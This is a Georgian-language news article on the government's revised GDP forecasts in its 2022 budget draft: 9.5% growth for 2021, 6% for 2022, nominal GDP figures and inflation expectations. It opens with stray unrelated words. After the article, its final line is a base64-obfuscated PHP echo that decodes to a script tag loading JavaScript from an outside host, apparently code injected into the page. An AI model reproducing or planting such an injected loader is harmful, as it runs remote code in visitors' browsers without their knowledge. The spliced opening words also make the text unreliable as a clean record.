celsiusi
ავერსი შნაიდერი
მთავრობა 2021 წელს მშპ-ს საპროგნოზო მაჩვენებელს არსებული 7,7%-დან 9,5%-მდე ზრდის, გაისად კი ეკონომიკის 6%-იან ზრდას პროგნოზირებს.
 
ამის შესახებ BPN- ის ინფორმაციით, 2022 წლის ბიუჯეტის პროექტის განმარტებით ბარათშია აღნიშნული.
 
„ამ ეტაპისთვის არსებული პროგნოზების მიხედვით, 2022 წლისათვის მოსალოდნელია მშპ-ის რეალური ზრდა 6.0%-ის ფარგლებში, ხოლო მომდევნო წლებშიც საშუალოდ 5.5%-ის ფარგლებში. მშპ-ის დეფლატორის პროგნოზი 2022 წელს პროგნოზირებულია 4,5%-ის ფარგლებში, ხოლო შემდგომ წლებში 3%-ის ფარგლებში.
 
მაკროეკონომიკური მაჩვენებლებიდან გამომდინარე 2022 წლის ნომინალური მშპ-ს მოცულობა 64.7 მლრდ ლარს შეადგენს, ხოლო 2025 წლისთვის პროგნოზირებულია მისი გაზრდა 82,6 მლრდ ლარამდე“, - აღნიშნულია განმარტებით ბარათში.
 
რაც შეეხება 2021 წლის ეკონომიკური ზრდის პროგნოზს, მთავრობამ ის კიდევ ერთხელ გაზარდა. როგორც 2022 წლის სახელმწიფო ბიუჯეტის პროექტშია აღნიშნული, მთავრობა ელის რომ წელს ეკონომიკა 9.5%-ით გაიზრდება და ნომინალურ გამოსახულებაში 58 427.9 მლნ ლარი იქნება. ახალი პროგნოზი 1.8 პროცენტული პუნქტით მეტია აქამდე არსებულ 7.7%-იან საპროგნოზო მაჩვენებელზე.
 
„პროგნოზირებულზე მაღალი ეკონომიკური ზრდის ტემპები შენარჩუნდა ივნისი-აგვისტოს პერიოდშიც. მეორე კვარტლის ეკონომიკური ზრდის მაჩვენებელმა 29,9% შეადგინა, ივლისში 9,9%, ხოლო აგვისტოში 10,3%, შედეგად, 8 თვის წინასწარი მონაცემებით რეალური ეკონომიკური ზრდა 12,0%-ს შეადგენს.
 
ზემოაღნიშნულის გათვალისწინებით, კიდევ ერთხელ გაიზარდა 2021 წლის ეკონომიკური ზრდის პროგნოზი და 9,5%-ს შეადგენს.
 
ფაქტიური მონაცემებიდან გამომდინარე, ასევე გაიზარდა მთლიანი შიდა პროდუქტის დეფლატორის მაჩვენებელი, რომელიც განახლებული პროგნოზის მიხედვით 8,0%-ს შეადგენს.
 
ეკონომიკური ზრდის და მშპ-ს დეფლატორის ზრდიდან გამომდინარე, გაიზარდა ნომინალური მთლიანი შიდა პროდუქტი და ნაცვლად ივლისში პროგნოზირებული 57,2 მლრდ ლარისა, 58,4 მლრდ ლარს შეადგენს“, - აღნიშნულია განმარტებით ბარათში.
 
რაც შეეხება ინფლაციასთან დაკავშირებულ მოლოდინს, მიუხედავად იმისა, რომ ინფლაციის მაჩვენებელი 2021 წლისთვის 8.9%-მდე გაიზრდება, მთავრობა საშუალოვადიან პერიოდში ფასების საერთო დონის შემცირებას და 2022-2025 წლებში მიზნობრივ 3%-იან მაჩვენებელზე შენარჩუნებას ელის.
1143
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");